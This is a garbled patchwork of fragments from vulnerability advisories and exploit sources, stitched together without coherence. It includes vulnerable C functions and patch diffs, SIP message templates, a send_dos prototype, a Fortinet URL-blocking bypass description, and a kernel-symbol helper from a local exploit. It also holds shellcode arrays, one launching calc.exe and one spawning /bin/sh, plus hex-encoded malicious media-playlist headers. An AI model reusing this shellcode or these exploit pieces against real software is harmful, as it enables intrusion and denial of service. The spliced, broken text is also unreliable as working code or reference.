char
void split_redraw(void)
{
int max;
int at;
ip_t *addr;
char *name;
char newLine[MAX_LINE_SIZE];
int i;
...
if ( $expired < time() )
return false;
...
// A mysterious hash is used here: the hash becomes a seven-character
// word generated by wp_generate_password() (a.k.a. SECRET_SALT).
// Note that wp_salt() sets $secret_key to null if SECRET_KEY is
// equal to the default value.
.
// The argument passed to wp_hash() in the next line is
// completely poisonable.
- --- 0.Description ---
SYNOPSIS
#include <floatingpoint.h>
char *econvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
char *fconvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
};
+/* This is at least as big as the largest size of an integer that
+ encode_int can generate; it is sufficient for creating buffers for
+ it to write into. This assumes that integers are at most 64 bits,
+ and so 10 bytes (with 7 bits of information each) are sufficient to
+ represent them. */
+#define MAX_ENCODED_INT_LEN 10
+/* This is at least as big as the largest size for a single instruction. */
+#define MAX_INSTRUCTION_LEN (2*MAX_ENCODED_INT_LEN+1)
+/* This is at least as big as the largest possible instructions
In Microsoft Virtual PC and Windows Virtual PC, the Virtual Machine
Monitor (VMM) is responsible for mediating access to hardware resources
and devices from operating systems running in a virtualized environment.
The transparency and efficiency of this mediation layer is one of the
core characteristics of modern virtualization technologies. In this
context, to maintain an equivalent level of risk for the same
application independently of whether it is running on a virtualized or a
non-virtualized environment, the OS hardening and anti-exploitation
mechanisms of a Windows operating system running directly on hardware
should have the exact same effectiveness and efficiency when the OS runs
/-----------
Xml2thot.c
3247 static void EndOfXmlAttributeValue (char *attrValue)
3248
3249 {
3250 AttributeType attrType;
3251 int attrKind, val;
3252 unsigned char msgBuffer[MaxMsgLength];
Vendor: http://www.php.net
- --- 0.Description ---
strfmon -- convert monetary value to string
The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array.
The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character.
SYNOPSIS:
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
#define closesocket close
#define SOCKET int
#define DWORD unsigned long
#endif
char *craft_pkt =
"MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"
"Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"
"From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"
"To: <sip:[TOADDR]>\r\n"
"Call-ID: [CALLID]@[DOMAIN]\r\n"
#define closesocket close
#define SOCKET int
#define DWORD unsigned long
#endif
char *craft_pkt[] =
{
"MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"
"Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"
"From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"
"To: <sip:[TOADDR]>\r\n"
--- 1.Description ---
libzip allows remote and local attackers to cause a denial of service (NULL pointer dereference) if the ZIP_FL_UNCHANGED flag is set.
-lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;
lib/http.c
...
extract_header_value(header, info->http_location, "Location:");
...
int extract_header_value (char *header, char *dest, char *match)
{
char* start = (char *)strstr(header, match);
if (start) {
subnstr_until(start+strlen(match), "\n", dest, MAX_ICY_STRING);
return 1;
/* Function prototypes. The bodies are defined elsewhere in the file and are
 * not shown here. The prototypes omit parameter names, so the role of each
 * argument can only be guessed from the function name -- confirm against the
 * definitions before relying on any of the guesses below. */
int open_socket (void);
int close_socket (int);                /* NOTE(review): argument presumably the fd returned by open_socket() */
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);     /* NOTE(review): looks like it maps a host string to an address value -- verify */
unsigned long get_int_ipv4 (char *);
/* Globals: file-scope mutable state shared by the helpers above. Neither has
 * an initialiser, so both start at zero (static storage duration); where and
 * when they are assigned is not visible in this excerpt. */
int sockfd;
int nhrp_req_id;
/* opcode: 0x01, address: 0x004922F0 (address from 2007
ProPremier)*/
long sub_4922F0 (
[in] long arg_1,
[in][size_is(arg_1)] char * arg_2,
[in] hyper arg_3
);
Exploitation:
SYNOPSIS
#include <fnmatch.h>
int
fnmatch(const char *pattern, const char *string, int flags);
--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
An attacker who can control the first and second parameters (pattern, string) of fnmatch(3) can cause CPU resource exhaustion. To see the problem's huge complexity, compile the code below:
/* Maximum field lengths used for fixed-size buffers. Whether each count
 * includes the terminating NUL is not visible here -- check every user of
 * these constants before sizing a copy against them. */
#define MAX_LOGIN 16
#define MAX_GECOS 128
#define MAX_HOME 128
#define MAX_SHELL 128
/* 64-entry lookup table using the crypt(3)-style base-64 alphabet
 * ("./", digits, upper case, lower case). The literal is exactly 64
 * characters and the array is declared [64], so NO terminating NUL is
 * stored: index it with a 6-bit value only; never pass it to strlen(),
 * printf("%s") or any other routine that expects a C string. */
static char itoa64[64] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/* Run-time flags, both off by default. What "relaxed" loosens is not
 * visible in this excerpt. */
static int debug = 0, relaxed = 0;
/* Shared scratch buffer; SOCKET_BUF is defined elsewhere in the file.
 * Every write into it must be bounded by sizeof buf (== SOCKET_BUF). */
static char buf[SOCKET_BUF];
--- 0.Description ---
The getservbyname() and getservbyport() functions each return a pointer to an object with the following structure, containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
getservbyport(int port, const char *proto);
The getservbyname() and getservbyport() functions sequentially search from the beginning of the file until a matching protocol name or port number is found, or until EOF is encountered. If a protocol name is also supplied (non-NULL), searches must also match the protocol.
#define OFFSET 4096
// calc (pour tester l'exploit)
char scode1[]=
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
/*
* those are the standard RFC 1321 test vectors
*/
static char *msg[] =
{
"",
"a",
"abc",
"message digest",
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
of 15 bytes called trash, used as the destination of sscanf() without the
needed size limit.
From rtsp/RTSP_state_machine.c:
int RTSP_valid_response_msg(unsigned short *status, char *msg, RTSP_buffer * rtsp)
// This routine is from BP.
{
char ver[32], trash[15];
unsigned int stat;
unsigned int seq;
diff --git a/usr.sbin/ppp/systems.c b/usr.sbin/ppp/systems.c
index 77f06a1..0cf01d1 100644
--- a/usr.sbin/ppp/systems.c
+++ b/usr.sbin/ppp/systems.c
@@ -82,6 +82,10 @@ InterpretArg(const char *from, char *to)
from++;
while (*from != '\0') {
+ if (to >= endto) {
+ *endto = '\0';
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
fetchmail-SA-2010-02: Denial of service in debug mode w/ multichar locales
Topics: Denial of service in debug output
Author: Matthias Andree
Version: 1.0
Announced: 2010-05-06
Description:
"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:
1.- HTTP Requests are terminated by the CRLF characters.
2.- Forcing to talk via HTTP/1.0 version so that dont send the host header.
3.- Finally, by Fragmenting the GET or POST requests
Analysis:
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
(gdb) x/x $edi
0x0: Cannot access memory at address 0x0
In this case, memset() overwrites the memory with the 0x0 byte. If an attacker could supply something other than 0x0, it would have a security impact.
There are more interesting places where a user may try to change the size passed to malloc. See below.
-id0-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
char header1[]=
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20"
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72"
"\x79\x3E\x0D\x0D\x0A\x3C\x74\x69\x74\x6C\x65\x3E\x61\x72\x63"
"\x68\x20\x65\x6E\x65\x6D\x79\x2D\x6E\x65\x6D\x73\x69\x73\x2E"
"\x6D\x70\x33\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0D\x0A\x3C"
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
// unicode format
char header1[]=
"\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22"
"\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e"
"\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20"
"\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33"
"\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20"
int main()
{
int i;
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
diff --git a/libcutils/strdup8to16.c b/libcutils/strdup8to16.c
index 8654b04..13a6430 100644
--- a/libcutils/strdup8to16.c
+++ b/libcutils/strdup8to16.c
@@ -49,6 +49,7 @@ extern char16_t * strdup8to16 (const char* s, size_t *out_len)
len = strlen8to16(s);
// no plus-one here. UTF-16 strings are not null terminated
+ /* Integer overflow here; pass 2.1GB string here and see .... */
ret = (char16_t *) malloc (sizeof(char16_t) * len);
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];